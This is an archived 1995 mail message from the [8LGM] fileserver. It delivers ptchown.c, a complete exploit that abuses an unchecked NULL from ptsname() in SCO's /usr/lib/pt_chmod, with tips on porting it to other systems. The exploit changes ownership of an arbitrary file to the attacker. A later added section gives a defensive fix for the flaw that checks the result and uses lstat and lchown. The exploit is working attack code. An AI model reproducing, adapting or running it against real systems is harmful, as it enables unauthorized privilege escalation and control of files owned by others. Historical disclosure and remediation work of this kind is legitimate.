From fileserv@bagpuss.demon.co.uk Fri Dec  1 16:23:24 1995
Return-Path: fileserv@bagpuss.demon.co.uk
Received: from mail.netcom.com (root@mail.netcom.com [192.100.81.99]) by onyx.infonexus.com (8.6.12/8.6.9) with ESMTP id QAA25812 for <root@infonexus.com>; Fri, 1 Dec 1995 16:23:21 -0800
Received: from relay-1.mail.demon.net by mail.netcom.com (8.6.12/Netcom)
	id QAA22397; Fri, 1 Dec 1995 16:19:52 -0800
Received: from bagpuss.demon.co.uk by relay-1.mail.demon.net id sg.aa26481;
          2 Dec 95 0:20 GMT
Received: (root@localhost) by bagpuss.demon.co.uk (3.1/3.1) id XAA02216; Fri, 1 Dec 1995 23:37:17 GMT
Date: Fri, 1 Dec 1995 23:37:17 GMT
From: "[8LGM] Fileserver" <fileserv@bagpuss.demon.co.uk>
Message-Id: <199512012337.XAA02216@bagpuss.demon.co.uk>
To: Route <daemon9@netcom.com>
Reply-To: 8lgm-fileserver@bagpuss.demon.co.uk
Subject: ptchown.c
X-SMTP-Posting-Host: bagpuss.demon.co.uk [Sat, 2 Dec 95 0:20:53 GMT]
Status: RO

	WE RESERVE THE RIGHT TO PUBLISH NAMES OF PEOPLE REQUESTING
	INFORMATION FROM OUR SERVER.  IF YOU DO NOT AGREE TO THIS,
	PLEASE DO NOT REQUEST INFORMATION.

This document is Copyright(C) 1994, 1995 by [8LGM] and your usage of the
information contained within this document constitutes your agreement to render
[8LGM] and all associated parties free from any direct or consequential
liabilities or damages which may be incurred as the result of such usage.

[8LGM] makes this information available in good faith, to make it possible
for System Administrators to have the necessary tools to be able to fix their
own systems.  However [8LGM] does not endorse the usage of this information
for any purposes.

Permission is hereby granted for usage only in accordance with the conditions
of usage as set forth herein.



ptchown.c:
/*
 * ptchown.c
 * Usage: ptchown file
 * Copyright [8lgm] 1994, all rights reserved.
 *
 * Utilises flaw in /usr/lib/pt_chmod to chown 'file' to your uid/gid.
 * If invoked with a fd that isn't a valid master pty, ptsname() will
 * return NULL, which goes unchecked.  pt_chmod will thus execute:
 *
 *	chown(NULL, getuid(), getgid());
 *
 * If your OS maps page 0, such that NULL is a valid address, the chown(2)
 * will succeed.  This program works by symlinking 'file' to NULL, and then
 * executing pt_chmod with an 'invalid' fd.
 *
 * The values given in null_file[] work on our SCO 3.2v4 system.  On some
 * systems the values may change from process to process.  To find out the
 * correct values for your system, run /usr/lib/pt_chmod under your favourite
 * debugger, and print the first few words from address 0 onwards, until
 * you hit a null byte.
 */

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>	/* exit(), system() */
#include <unistd.h>	/* symlink(), close(), unlink() */

int null_file[3] = {0x8014c, 0x2ba4fde9, 0x0};

int
main(argc, argv)
	int argc;
	char *argv[];
{
	if (argc != 2) {
		fprintf(stderr, "usage: %s file\n", argv[0]);
		exit(1);
	}
	if (symlink(argv[1], (char *)null_file)) {
		perror(argv[1]);
		exit(1);
	}
	close(0);
	open("/dev/null", O_RDONLY);
	system("/usr/lib/pt_chmod");
	unlink((char*)null_file);
	exit(0);
}
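
The fix for the flaw described in the ptchown.c header comment is to check the ptsname() result before it reaches chown(2), and to refuse to act on anything that is not a character device. The following is an added example, not [8LGM] code and not the vendor's pt_chmod source; the helper names slave_name_checked() and grant_slave() are hypothetical.

```c
#define _XOPEN_SOURCE 700   /* ptsname(), lchown() */
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Matches the <stdlib.h> prototype; repeated so the block builds even when
 * feature-test macros were fixed by an earlier include. */
char *ptsname(int fd);

/* Hypothetical helper: copy the slave name for master_fd into buf.
 * Returns 0 on success, -1 if fd is not a pty master or the name is unusable. */
int slave_name_checked(int master_fd, char *buf, size_t len)
{
    const char *name = ptsname(master_fd);

    if (name == NULL)               /* the check the header comment says is missing */
        return -1;
    if (name[0] != '/' || strlen(name) >= len) {
        errno = ENAMETOOLONG;
        return -1;
    }
    strcpy(buf, name);
    return 0;
}

/* Hypothetical helper: give the slave device to the calling user. */
int grant_slave(int master_fd)
{
    char path[128];
    struct stat st;

    if (slave_name_checked(master_fd, path, sizeof path) != 0)
        return -1;                  /* never reach chown with a bad name */
    if (lstat(path, &st) != 0)
        return -1;
    if (!S_ISCHR(st.st_mode)) {     /* symlink or regular file: refuse */
        errno = ENOTTY;
        return -1;
    }
    /* lchown() does not follow a symlink swapped in after the lstat(). */
    return lchown(path, getuid(), getgid());
}
```

With either check in place, a descriptor that is not a master pty makes the helper return an error instead of passing NULL to the ownership call.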

